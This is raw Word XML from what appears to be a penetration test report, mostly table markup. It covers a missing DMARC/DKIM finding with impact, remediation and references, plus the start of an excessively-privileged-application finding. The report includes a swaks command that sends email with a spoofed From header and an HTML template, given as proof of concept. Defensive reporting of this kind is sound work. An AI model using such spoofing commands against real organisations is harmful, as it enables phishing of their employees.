      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="12700FB3">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>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8192729" w14:textId="23D0E953">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0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1D8587B5" w14:textId="1741488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Low</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7AFC57E1"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="140FC736"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="30214949">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C42E797" w14:textId="6CED6DDD">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33EEB44" w14:textId="02049516">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" r:id="Re29aa97dbbf54468">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3A789030">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569"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09884F8" w14:textId="59926BF3">
            <w:pPr>
              <w:bidi w:val="0"/>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1EDF430" w14:textId="5E575BA6">
            <w:pPr>
              <w:bidi w:val="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00B24DD" w14:textId="3961F030">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rPr>
            </w:pPr>
            <w:hyperlink r:id="Ra61352909a044714">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1534: Internal Spearphishing</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="04E200F2" w14:textId="10B5F038">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rPr>
            </w:pPr>
            <w:hyperlink r:id="R1a93c9aa9f6e4837">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1598: Phishing for Information</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="0308591C">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65E7FE5B"/>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FC6CEBF" w14:textId="7184C1A8">
            <w:pPr>
              <w:bidi w:val="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6876FA9" w14:textId="71F13951">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R6f63f5fbdee341a9">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">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0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4D8B63BB">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A25A480" w14:textId="59885404">
            <w:pPr>
              <w:bidi w:val="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4FB6C4B" w14:textId="41736145">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="57D65DCF" w14:textId="1C3A837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5CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="532D8171" w14:textId="1E182C1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5CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="005DAF52" w14:textId="404362C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The SMTP server is missing a DMARC and DKIM record. Unenforced DMARC allows an attacker to spoof the domain in phishing attacks by allowing unauthorized use of the domain in the Friendly-From address of email messages. Unenforced DKIM means that verification of senders is not performed on the SMTP server, enabling users to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more easily perform phishing campaigns</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on ATP employees.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="34A94784" w14:textId="353851D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5B6724F8" w14:textId="48E1DF8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5CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="64F34F4A" w14:textId="22DEAB6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abuse this misconfiguration to perform domain spoofing in targeted phishing campaigns on ATP employees. These emails will not be verified as coming from internal ATP employees but will appear to be coming from the ATP domain. This will make phishing attempts much harder to detect and will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likely result</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in increased employee interaction with malicious, phishing emails.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4421AD6D" w14:textId="050A377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28CD1B23" w14:textId="7FE2C7A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5CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="0C93998F" w14:textId="41E0B97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swaks</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ehlo</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–from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name@domain</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user@domain</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–server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smpt.server.local</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--h-From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‘”Name</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&lt;</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name@domain</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&gt;’ --attach-type text/html --attach-body @Mail-template.html </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2D25C198" w14:textId="596B1E9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5224D5B0" w14:textId="140DE34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622DA727" w14:textId="4D3777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65CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="5E464DB0" w14:textId="4A0696C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5CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="09E0E89A" w14:textId="47756753">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>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Enforce DMARC by adding a record to the domain and specifying the enforcement policy to quarantine or reject emails </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containing</w:t>
      </w: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 a mismatch between sender and from, which is likely to be a domain spoofing attempt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="65CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="66650B10" w14:textId="59C25767">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>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 xml:space="preserve">Enforce DKIM which will verify domain identities when sending emails. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="65CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="69A15E3E" w14:textId="6AD4D533">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>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CD89C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implement email quarantining and filtering to block malicious emails and phishing attempts from being delivered to employee inboxes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6A5AD327" w14:textId="19218861">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="72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65CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="150615FB" w14:textId="5D51E0DD">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="65CD89C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reference</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="65CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="353A756B" w14:textId="4CC7854D">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3e8a9f3b009a46ae">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="65CD89C4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>RackSpace - Create a DMARC Policy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="65CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="23FB2E07" w14:textId="131A45BD">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R48b695741e924190">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="65CD89C4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>RackSpace - Enable DKIM</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="65CD89C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="65CD89C4" w:rsidP="0D325B6E" w:rsidRDefault="65CD89C4" w14:paraId="50B23FCD" w14:textId="532464D5">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574f553e75654c15">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="65CD89C4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Higherlogic - SPF, DKIM, DMARC Email Authentication</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="799BDA4F" w14:textId="50471A0F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2999EBE6" w14:textId="4967D5FD">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="1AA6AC6C" w:rsidP="0D325B6E" w:rsidRDefault="1AA6AC6C" w14:paraId="0AC84D09" w14:textId="3799C9F3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1063055675" w:id="1857806286"/>
      <w:r w:rsidR="1AA6AC6C">
        <w:rPr/>
        <w:t>Informational:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1857806286"/>
    </w:p>
    <w:p w:rsidR="1D7C1D3D" w:rsidP="0D325B6E" w:rsidRDefault="1D7C1D3D" w14:paraId="1130982D" w14:textId="13F12139">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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886776176" w:id="1843685568"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1D7C1D3D">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80" w:themeShade="FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1D7C1D3D">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1D7C1D3D">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1D7C1D3D">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc537206895" w:id="1307941610"/>
      <w:bookmarkStart w:name="_Toc1650900307" w:id="1249927186"/>
      <w:bookmarkStart w:name="_Toc64580688" w:id="138439730"/>
      <w:bookmarkStart w:name="_Toc1197897101" w:id="671726435"/>
      <w:bookmarkStart w:name="_Toc1912955216" w:id="2046217065"/>
      <w:bookmarkStart w:name="_Toc637989599" w:id="1996648535"/>
      <w:bookmarkStart w:name="_Toc827859079" w:id="1027372003"/>
      <w:bookmarkStart w:name="_Toc427985713" w:id="1991532864"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2AAB7E19">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Excessively Privileged Application</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1307941610"/>
      <w:bookmarkEnd w:id="1249927186"/>
      <w:bookmarkEnd w:id="138439730"/>
      <w:bookmarkEnd w:id="671726435"/>
      <w:bookmarkEnd w:id="2046217065"/>
      <w:bookmarkEnd w:id="1996648535"/>
      <w:bookmarkEnd w:id="1027372003"/>
      <w:bookmarkEnd w:id="1991532864"/>
      <w:bookmarkEnd w:id="184368556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296BF5A6">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A1DE06" w14:textId="44FE18C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D60926C" w14:textId="3871878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63EE52" w14:textId="25393D2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73CF9DB0">
        <w:trPr>
          <w:trHeight w:val="375"/>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970D485" w14:textId="457D1A5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6522EED6" w:rsidP="0D325B6E" w:rsidRDefault="6522EED6" w14:paraId="31EE34F4" w14:textId="6E3C3B3B">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="6522EED6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Information</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="39419BDE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>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567A2492" w:rsidP="0D325B6E" w:rsidRDefault="567A2492" w14:paraId="45ECF811" w14:textId="3AB2353D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="567A2492">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2A6529FC" w14:textId="1CDAC663">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>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7D9FC24E">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905FB3A" w14:textId="3A66756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36AF6D1" w:rsidP="0D325B6E" w:rsidRDefault="236AF6D1" w14:paraId="51022C08" w14:textId="2A220693">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236AF6D1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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56F84EE2"/>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921E41A"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="6FB5ACC3">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6BF0DDB" w14:textId="2E643D2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FC2AD73" w:rsidP="0D325B6E" w:rsidRDefault="7FC2AD73" w14:paraId="23061C2B" w14:textId="760843E9">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="7FC2AD73">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7C01A1DC">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32F862B" w14:textId="41AAAF1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5B4AD6FD" w:rsidP="0D325B6E" w:rsidRDefault="5B4AD6FD" w14:paraId="0F174D85" w14:textId="4BBDAE46">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5B4AD6FD">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2D8C062" w:rsidP="0D325B6E" w:rsidRDefault="32D8C062" w14:paraId="4BD178C1" w14:textId="2D21428F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R3b8ede3b29bf479e">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="32D8C062">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>T1611</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="4852FD0D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="32D8C062">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t xml:space="preserve"> Escape to host</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="2BFD413C" w:rsidP="0D325B6E" w:rsidRDefault="2BFD413C" w14:paraId="212FC174" w14:textId="1DE04837">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
